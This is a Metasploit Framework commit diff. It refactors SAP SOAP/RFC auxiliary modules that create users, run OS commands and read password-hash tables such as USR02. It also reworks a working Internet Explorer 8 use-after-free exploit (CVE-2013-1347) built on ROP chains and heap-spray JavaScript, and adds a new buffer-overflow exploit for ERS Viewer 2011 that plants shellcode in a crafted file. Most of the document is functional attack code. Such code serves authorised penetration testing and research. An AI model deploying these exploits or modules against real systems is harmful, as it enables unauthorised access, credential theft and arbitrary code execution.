bug/bundler_fix
jvazquez-r7 2013-05-08 16:29:52 -05:00
commit 866fa167ab
14 changed files with 279 additions and 254 deletions

View File

@ -15,7 +15,7 @@ class Metasploit4 < Msf::Auxiliary
def initialize
super(
'Name' => 'SAP Management Console ABAP syslog',
'Name' => 'SAP Management Console ABAP Syslog Disclosure',
'Description' => %q{ This module simply attempts to extract the ABAP syslog through the SAP Management Console SOAP Interface. },
'References' =>
[
@ -106,7 +106,7 @@ class Metasploit4 < Msf::Auxiliary
if success
print_status("#{rhost}:#{rport} [SAP] ABAP syslog downloading")
print_status("#{rhost}:#{rport} [SAP] Storing looted SAP ABAP syslog XML file")
store_loot(
path = store_loot(
"sap.abap.syslog",
"text/xml",
rhost,
@ -114,7 +114,7 @@ class Metasploit4 < Msf::Auxiliary
"sap_abap_syslog.xml",
"SAP ABAP syslog"
)
print_good("#{rhost}:#{rport} [SAP] SAP ABAP syslog XML file stored at #{path}")
elsif fault
print_error("#{rhost}:#{rport} [SAP] Error code: #{faultcode}")
return

View File

@ -70,21 +70,20 @@ class Metasploit4 < Msf::Auxiliary
data << '</n1:BAPI_USER_CREATE1>'
data << '</env:Body>'
data << '</env:Envelope>'
user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
begin
print_status("[SAP] #{ip}:#{rport} - Attempting to create user '#{datastore['BAPI_USER']}' with password '#{datastore['BAPI_PASSWORD']}'")
res = send_request_raw({
res = send_request_cgi({
'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
'method' => 'POST',
'data' => data,
'headers' =>{
'Content-Length' => data.size.to_s,
'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
'ctype' => 'text/xml; charset=UTF-8',
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'headers' =>
{
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
'Authorization' => 'Basic ' + user_pass,
'Content-Type' => 'text/xml; charset=UTF-8'
}
}, 45)
})
if res and res.code == 200
if res.body =~ /<h1>Logon failed<\/h1>/
print_error("[SAP] #{ip}:#{rport} - Logon failed")

View File

@ -118,19 +118,19 @@ class Metasploit4 < Msf::Auxiliary
data << '</n1:RFC_PING>'
data << '</env:Body>'
data << '</env:Envelope>'
user_pass = Rex::Text.encode_base64(username+ ":" + password)
begin
res = send_request_raw({
res = send_request_cgi({
'uri' => '/sap/bc/soap/rfc?sap-client=' + client + '&sap-language=EN',
'method' => 'POST',
'data' => data,
'headers' =>{
'Content-Length' => data.size.to_s,
'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + client,
'ctype' => 'text/xml; charset=UTF-8',
'authorization' => basic_auth(username, password),
'headers' =>
{
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + client,
'Authorization' => 'Basic ' + user_pass,
'Content-Type' => 'text/xml; charset=UTF-8'}
}, 45)
}
})
if res and res.code == 200
report_auth_info(
:host => rhost,

View File

@ -73,7 +73,7 @@ class Metasploit4 < Msf::Auxiliary
if num == 1
command = '-o c:\\\pwn.out -n pwnsap' + "\r\n!"
space = "%programfiles:~10,1%"
command << datastore['COMMAND'].gsub(" ",space)
command << datastore['CMD'].gsub(" ",space)
end
command = '-ic c:\\\pwn.out' if num == 2
end
@ -92,22 +92,19 @@ class Metasploit4 < Msf::Auxiliary
end
def exec_command(ip,data)
user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_CALL_SYSTEM request")
begin
res = send_request_raw(
{
res = send_request_cgi({
'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
'method' => 'POST',
'data' => data,
'headers' => {
'Content-Length' => data.size.to_s,
'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
'ctype' => 'text/xml; charset=UTF-8',
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'headers' =>{
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
'Authorization' => 'Basic ' + user_pass,
'Content-Type' => 'text/xml; charset=UTF-8'
}
}, 45)
})
if res and res.code != 500 and res.code != 200
print_error("[SAP] #{ip}:#{rport} - something went wrong!")
return

View File

@ -74,7 +74,7 @@ class Metasploit4 < Msf::Auxiliary
if num == 1
command = '-o c:\\\pwn.out -n pwnsap' + "\r\n!"
space = "%programfiles:~10,1%"
command << datastore['COMMAND'].gsub(" ",space)
command << datastore['CMD'].gsub(" ",space)
end
command = '-ic c:\\\pwn.out' if num == 2
end
@ -93,22 +93,19 @@ class Metasploit4 < Msf::Auxiliary
end
def exec_command(ip,data)
user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request")
begin
res = send_request_raw(
{
res = send_request_cgi({
'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
'method' => 'POST',
'data' => data,
'headers' => {
'Content-Length' => data.size.to_s,
'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
'ctype' => 'text/xml; charset=UTF-8',
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'headers' =>{
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
'Authorization' => 'Basic ' + user_pass,
'Content-Type' => 'text/xml; charset=UTF-8'
}
}, 45)
})
if res
if res.code != 500 and res.code != 200
print_error("[SAP] #{ip}:#{rport} - something went wrong!")

View File

@ -61,22 +61,20 @@ class Metasploit4 < Msf::Auxiliary
data << '</n1:RFC_PING>'
data << '</env:Body>'
data << '</env:Envelope>'
user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
print_status("[SAP] #{ip}:#{rport} - sending SOAP RFC_PING request")
begin
res = send_request_raw({
res = send_request_cgi({
'uri' => '/sap/bc/soap/rfc?sap-client=' + client + '&sap-language=EN',
'method' => 'POST',
'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + client,
'data' => data,
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'ctype' => 'text/xml; charset=UTF-8',
'headers' =>
{
'Content-Length' => data.size.to_s,
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + client,
'Authorization' => 'Basic ' + user_pass,
'Content-Type' => 'text/xml; charset=UTF-8'
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions'
}
}, 45)
})
if res and res.code != 500 and res.code != 200
if res and res.body =~ /<h1>Logon failed<\/h1>/
print_error("[SAP] #{ip}:#{rport} - login failed!")

View File

@ -49,8 +49,8 @@ class Metasploit4 < Msf::Auxiliary
OptString.new('CLIENT', [true, 'SAP client', '001']),
OptString.new('USERNAME', [true, 'Username', 'SAP*']),
OptString.new('PASSWORD', [true, 'Password', '06071992']),
OptString.new('TABLE', [true, 'Table to read', nil]),
OptString.new('FIELDS', [true, 'Fields to read', '*'])
OptString.new('TABLE', [true, 'Table to read', 'USR02']),
OptString.new('FIELDS', [true, 'Fields to read', 'BNAME,BCODE'])
], self.class)
end
@ -82,21 +82,22 @@ class Metasploit4 < Msf::Auxiliary
data << '</n1:RFC_READ_TABLE>'
data << '</env:Body>'
data << '</env:Envelope>'
user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
print_status("[SAP] #{ip}:#{rport} - sending SOAP RFC_READ_TABLE request")
begin
res = send_request_raw({
res = send_request_cgi({
'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
'method' => 'POST',
'data' => data,
'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'ctype' => 'text/xml; charset=UTF-8',
'headers' =>{
'Content-Length' => data.size.to_s,
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
'Authorization' => 'Basic ' + user_pass,
'Content-Type' => 'text/xml; charset=UTF-8'
#'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
#'Authorization' => 'Basic ' + user_pass,
#'Content-Type' =>
}
}, 45)
})
if res and res.code != 500 and res.code != 200
# to do - implement error handlers for each status code, 404, 301, etc.
if res.body =~ /<h1>Logon failed<\/h1>/

View File

@ -68,42 +68,46 @@ class Metasploit4 < Msf::Auxiliary
data << '</n1:SUSR_RFC_USER_INTERFACE>'
data << '</env:Body>'
data << '</env:Envelope>'
user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
begin
print_status("[SAP] #{ip}:#{rport} - Attempting to create user '#{datastore['ABAP_USER']}' with password '#{datastore['ABAP_PASSWORD']}'")
res = send_request_raw({
vprint_status("[SAP] #{ip}:#{rport} - Attempting to create user '#{datastore['ABAP_USER']}' with password '#{datastore['ABAP_PASSWORD']}'")
res = send_request_cgi({
'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
'method' => 'POST',
'data' => data,
'headers' =>{
'Content-Length' => data.size.to_s,
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
'Authorization' => 'Basic ' + user_pass,
'Content-Type' => 'text/xml; charset=UTF-8'}
}, 45)
'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
'ctype' => 'text/xml; charset=UTF-8',
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'headers' =>
{
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions'
}
})
if res and res.code == 200
if res.body =~ /<h1>Logon failed<\/h1>/
print_error("[SAP] #{ip}:#{rport} - Logon failed")
vprint_error("[SAP] #{ip}:#{rport} - Logon failed")
return
elsif res.body =~ /faultstring/
error = []
error = [ res.body.scan(%r{(.*?)}) ]
print_error("[SAP] #{ip}:#{rport} - #{error.join.chomp}")
vprint_error("[SAP] #{ip}:#{rport} - #{error.join.chomp}")
return
else
print_good("[SAP] #{ip}:#{rport} - User '#{datastore['ABAP_USER']}' with password '#{datastore['ABAP_PASSWORD']}' created")
return
end
elsif res and res.code == 500 and res.body =~ /USER_ALLREADY_EXISTS/
vprint_error("[SAP] #{ip}:#{rport} - user already exists")
return
else
print_error("[SAP] #{ip}:#{rport} - Unknown error")
print_error("[SAP] #{ip}:#{rport} - Error code: " + res.code) if res
print_error("[SAP] #{ip}:#{rport} - Error message: " + res.message) if res
vprint_error("[SAP] #{ip}:#{rport} - Unknown error")
vprint_error("[SAP] #{ip}:#{rport} - Error code: " + res.code) if res
vprint_error("[SAP] #{ip}:#{rport} - Error message: " + res.message) if res
return
end
rescue ::Rex::ConnectionError
print_error("[SAP] #{rhost}:#{rport} - Unable to connect")
vprint_error("[SAP] #{rhost}:#{rport} - Unable to connect")
return
end
end
end
end

View File

@ -49,7 +49,7 @@ class Metasploit4 < Msf::Auxiliary
OptString.new('CLIENT', [true, 'SAP Client', '001']),
OptString.new('USERNAME', [true, 'Username', 'SAP*']),
OptString.new('PASSWORD', [true, 'Password', '06071992']),
OptString.new('CMD', [true, 'SM69 command to be executed', nil]),
OptString.new('CMD', [true, 'SM69 command to be executed', 'PING']),
OptString.new('PARAM', [false, 'Additional parameters for the SM69 command', nil]),
OptEnum.new('OS', [true, 'SM69 Target OS','ANYOS',['ANYOS', 'UNIX', 'Windows NT', 'AS/400', 'OS/400']])
], self.class)
@ -72,21 +72,19 @@ class Metasploit4 < Msf::Auxiliary
data << '</n1:SXPG_CALL_SYSTEM>'
data << '</env:Body>'
data << '</env:Envelope>'
user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request")
begin
res = send_request_raw({
res = send_request_cgi({
'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
'method' => 'POST',
'data' => data,
'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
'ctype' => 'text/xml; charset=UTF-8',
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'headers' =>{
'Content-Length' => data.size.to_s,
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
'Authorization' => 'Basic ' + user_pass,
'Content-Type' => 'text/xml; charset=UTF-8'
}
}, 45)
})
if res and res.code != 500 and res.code != 200
# to do - implement error handlers for each status code, 404, 301, etc.
print_error("[SAP] #{ip}:#{rport} - something went wrong!")

View File

@ -49,7 +49,7 @@ class Metasploit4 < Msf::Auxiliary
OptString.new('CLIENT', [true, 'SAP Client', '001']),
OptString.new('USERNAME', [true, 'Username', 'SAP*']),
OptString.new('PASSWORD', [true, 'Password', '06071992']),
OptString.new('CMD', [true, 'SM69 command to be executed', nil]),
OptString.new('CMD', [true, 'SM69 command to be executed', 'PING']),
OptString.new('PARAM', [false, 'Additional parameters for the SM69 command', nil]),
OptEnum.new('OS', [true, 'SM69 Target OS','ANYOS',['ANYOS', 'UNIX', 'Windows NT', 'AS/400', 'OS/400']])
], self.class)
@ -72,21 +72,19 @@ class Metasploit4 < Msf::Auxiliary
data << '</n1:SXPG_COMMAND_EXECUTE>'
data << '</env:Body>'
data << '</env:Envelope>'
user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request")
begin
res = send_request_raw({
res = send_request_cgi({
'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
'method' => 'POST',
'data' => data,
'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
'ctype' => 'text/xml; charset=UTF-8',
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'headers' =>{
'Content-Length' => data.size.to_s,
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
'Authorization' => 'Basic ' + user_pass,
'Content-Type' => 'text/xml; charset=UTF-8'
}
}, 45)
})
if res and res.code != 500 and res.code != 200
# to do - implement error handlers for each status code, 404, 301, etc.
print_error("[SAP] #{ip}:#{rport} - something went wrong!")

View File

@ -88,22 +88,19 @@ class Metasploit4 < Msf::Auxiliary
data << '</n1:RFC_SYSTEM_INFO>'
data << '</env:Body>'
data << '</env:Envelope>'
user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
print_status("[SAP] #{ip}:#{rport} - sending SOAP RFC_SYSTEM_INFO request")
begin
res = send_request_raw({
'uri' => '/sap/bc/soap/rfc?sap-client=' + client + '&sap-language=EN',
res = send_request_cgi({
'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
'method' => 'POST',
'data' => data,
'headers' =>
{
'Content-Length' => data.size.to_s,
'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
'ctype' => 'text/xml; charset=UTF-8',
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'headers' =>{
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + client,
'Authorization' => 'Basic ' + user_pass,
'Content-Type' => 'text/xml; charset=UTF-8'
}
}, 45)
})
if res and res.code != 500 and res.code != 200
# to do - implement error handlers for each status code, 404, 301, etc.
print_error("[SAP] #{ip}:#{rport} - something went wrong!")

View File

@ -62,23 +62,20 @@ class Metasploit4 < Msf::Auxiliary
data << '</env:Body>'
data << '</env:Envelope>'
user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
print_status("[SAP] #{ip}:#{rport} - sending SOAP TH_SAPREL request")
begin
res = send_request_raw({
res = send_request_cgi({
'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
'method' => 'POST',
'data' => data,
'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
'ctype' => 'text/xml; charset=UTF-8',
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'headers' =>{
'Content-Length' => data.size.to_s,
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
'Authorization' => 'Basic ' + user_pass,
'Content-Type' => 'text/xml; charset=UTF-8'
}
}, 45)
})
if res and res.code == 200
kern_comp_on = $1 if res.body =~ /<KERN_COMP_ON>(.*)<\/KERN_COMP_ON>/i
kern_comp_time = $1 if res.body =~ /<KERN_COMP_TIME>(.*)<\/KERN_COMP_TIME>/i

View File

@ -1,5 +1,4 @@
##
#
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
@ -48,6 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'CVE', '2013-1347' ],
[ 'OSVDB', '92993' ],
[ 'US-CERT-VU', '237655' ],
[ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],
[ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup
],
@ -82,7 +82,6 @@ class Metasploit3 < Msf::Exploit::Remote
end
def get_target(agent)
#If the user is already specified by the user, we'll just use that
return target if target.name != 'Automatic'
nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
@ -114,80 +113,16 @@ class Metasploit3 < Msf::Exploit::Remote
return nil
end
def ie8_smil(my_target, p)
case my_target['Rop']
when :msvcrt
case my_target.name
when 'IE 8 on Windows XP SP3'
align_esp = Rex::Text.to_unescape([0x77c4d801].pack("V*")) # ADD ESP, 2C; RET
xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack("V*")) # XCHG EAX, ESP, RET
when 'IE 8 on Windows Server 2003'
align_esp = Rex::Text.to_unescape([0x77bde7f6].pack("V*"))
xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack("V*"))
end
else
align_esp = Rex::Text.to_unescape([0x7C3445F8].pack("V*"))
xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack("V*"))
end
padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))
js_payload = Rex::Text.to_unescape(p)
js = %Q|
unicorn = unescape("ABCD");
unicorn2 = unescape("EEEE");
for (i=0; i < 2; i++) {
unicorn += unescape("ABCD");
}unicorn += unescape("AB");
unicorn += unescape("#{js_payload}");
animvalues = unescape("#{align_esp}");
for (i=0; i < 0x70/4; i++) {
if (i == 0x70/4-1) {
animvalues += unescape("#{xchg_esp}");
}
else {
animvalues += unescape("#{align_esp}");
}
}
animvalues += unicorn;
for(i = 0; i < 13; i++) {
animvalues += ";red";
}
|
if datastore['OBFUSCATE']
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate
end
return js
end
def junk(n=4)
return rand_text_alpha(n).unpack("V")[0].to_i
end
def nop
return make_nops(4).unpack("V")[0].to_i
end
def get_payload(t, cli)
code = payload.encoded
# No rop. Just return the payload.
return code if t['Rop'].nil?
rop_payload = ''
case t['Rop']
when :msvcrt
case t.name
when 'IE 8 on Windows XP SP3'
rop_gadgets =
algin = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
chain = ''
if t.name == 'IE 8 on Windows XP SP3'
chain =
[
0x77c1e844, # POP EBP # RETN [msvcrt.dll]
0x77c1e844, # skip 4 bytes [msvcrt.dll]
@ -212,8 +147,12 @@ class Metasploit3 < Msf::Exploit::Remote
0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll]
].pack("V*")
when 'IE 8 on Windows Server 2003'
rop_gadgets =
elsif t.name == 'IE 8 on Windows Server 2003'
junk = rand_text_alpha(4).unpack("V")[0].to_i
nop = make_nops(4).unpack("V")[0].to_i
chain =
[
0x77bb2563, # POP EAX # RETN
0x77ba1114, # <- *&VirtualProtect()
@ -241,48 +180,39 @@ class Metasploit3 < Msf::Exploit::Remote
0x77be6591 # PUSHAD # ADD AL,0EF # RETN
].pack("V*")
end
else
rop_gadgets =
[
0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
0xfffffdff, # Value to negate, will become 0x00000201 (dwSize)
0x7c347f98, # RETN (ROP NOP) [msvcr71.dll]
0x7c3415a2, # JMP [EAX] [msvcr71.dll]
0xffffffff,
0x7c376402, # skip 4 bytes [msvcr71.dll]
0x7c351e05, # NEG EAX # RETN [msvcr71.dll]
0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll]
0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
0x7c344f87, # POP EDX # RETN [msvcr71.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x7c351eb1, # NEG EDX # RETN [msvcr71.dll]
0x7c34d201, # POP ECX # RETN [msvcr71.dll]
0x7c38b001, # &Writable location [msvcr71.dll]
0x7c347f97, # POP EAX # RETN [msvcr71.dll]
0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
0x7c345c30 # ptr to 'push esp # ret ' [msvcr71.dll]
# rop chain generated with mona.py
].pack("V*")
end
rop_payload = rop_gadgets
case t['Rop']
when :msvcrt
rop_payload << "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
rop_payload = chain + algin + payload.encoded
else
rop_payload << "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
code = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
code << payload.encoded
code << rand_text_alpha(12000)
rop_payload = generate_rop_payload('java', code)
end
rop_payload << code
rop_payload << rand_text_alpha(12000) unless t['Rop'] == :msvcrt
return rop_payload
end
def load_exploit_html(my_target, cli)
case my_target['Rop']
when :msvcrt
case my_target.name
when 'IE 8 on Windows XP SP3'
align_esp = Rex::Text.to_unescape([0x77c4d801].pack("V*")) # ADD ESP, 2C; RET
xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack("V*")) # XCHG EAX, ESP, RET
when 'IE 8 on Windows Server 2003'
align_esp = Rex::Text.to_unescape([0x77bde7f6].pack("V*"))
xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack("V*"))
end
else
align_esp = Rex::Text.to_unescape([0x7C3445F8].pack("V*"))
xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack("V*"))
end
padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))
js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))
p = get_payload(my_target, cli)
js = ie8_smil(my_target, p)
html = %Q|
<!doctype html>
@ -293,9 +223,10 @@ class Metasploit3 < Msf::Exploit::Remote
</meta>
<script>
#{js_mstime_malloc}
function helloWorld()
{
#{js}
f0 = document.createElement('span');
document.body.appendChild(f0);
f1 = document.createElement('span');
@ -306,21 +237,32 @@ class Metasploit3 < Msf::Exploit::Remote
f2.appendChild(document.createElement('datalist'));
f1.appendChild(document.createElement('span'));
f1.appendChild(document.createElement('table'));
try{
f0.offsetParent=null;
}catch(e) {
}f2.innerHTML="";
try { f0.offsetParent=null;}
catch(e) { }
f2.innerHTML = "";
f0.appendChild(document.createElement('hr'));
f1.innerHTML="";
f1.innerHTML = "";
CollectGarbage();
try {
a = document.getElementById('myanim');
a.values = animvalues;
sparkle = unescape("ABCD");
for (i=0; i < 2; i++) {
sparkle += unescape("ABCD");
}
catch(e) {}
sparkle += unescape("AB");
sparkle += unescape("#{js_payload}");
magenta = unescape("#{align_esp}");
for (i=0; i < 0x70/4; i++) {
if (i == 0x70/4-1) { magenta += unescape("#{xchg_esp}"); }
else { magenta += unescape("#{align_esp}"); }
}
magenta += sparkle;
mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:"myanim"});
}
</script>
@ -341,7 +283,6 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Requesting: #{uri}")
my_target = get_target(agent)
# Avoid the attack if no suitable target found
if my_target.nil?
print_error("Browser not supported, sending 404: #{agent}")
send_not_found(cli)
@ -355,4 +296,3 @@ class Metasploit3 < Msf::Exploit::Remote
end
end

View File

@ -0,0 +1,99 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
def initialize(info={})
super(update_info(info,
'Name' => "ERS Viewer 2011 ERS File Handling Buffer Overflow",
'Description' => %q{
This module exploits a buffer overflow vulnerability found in ERS Viewer 2011
(version 11.04). The vulnerability exists in the module ermapper_u.dll where the
function ERM_convert_to_correct_webpath handles user provided data in a insecure
way. It results in arbitrary code execution under the context of the user viewing
a specially crafted .ers file. This module has been tested successfully with ERS
Viewer 2011 (version 11.04) on Windows XP SP3 and Windows 7 SP1.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Parvez Anwar', # Vulnerability Discovery
'juan vazquez' # Metasploit
],
'References' =>
[
[ 'CVE', '2013-0726' ],
[ 'OSVDB', '92694' ],
[ 'BID', '59379' ],
[ 'URL', 'http://secunia.com/advisories/51725/' ]
],
'Payload' =>
{
'Space' => 7516,
'BadChars' => "\x22\x5c" +
(0x7f..0xff).to_a.pack("C*") +
(0x00..0x08).to_a.pack("C*") +
(0x0a..0x1f).to_a.pack("C*"),
'DisableNops' => true,
'EncoderOptions' =>
{
'BufferRegister' => 'ESP'
}
},
'SaveRegisters' => [ 'ESP' ],
'DefaultOptions' =>
{
'ExitFunction' => "process",
},
'Platform' => 'win',
'Targets' =>
[
[ 'ERS Viewer 2011 (v11.04) / Windows XP SP3 / Windows 7 SP1',
{
'Offset' => 260,
'Ret' => 0x67097d7a # push esp # ret 0x08 from QtCore4.dll
}
],
],
'Privileged' => false,
'DisclosureDate' => "Apr 23 2013",
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.ers']),
], self.class)
end
# Rewrote it because make_nops is ignoring SaveRegisters
# and corrupting ESP.
def make_nops(count)
return "\x43" * count # 0x43 => inc ebx
end
def exploit
buf = rand_text(target['Offset'])
buf << [target.ret].pack("V")
buf << make_nops(8) # In order to keep ESP pointing to the start of the shellcode
buf << payload.encoded
ers = %Q|
DatasetHeader Begin
Name = "#{buf}"
DatasetHeader End
|
file_create(ers)
end
end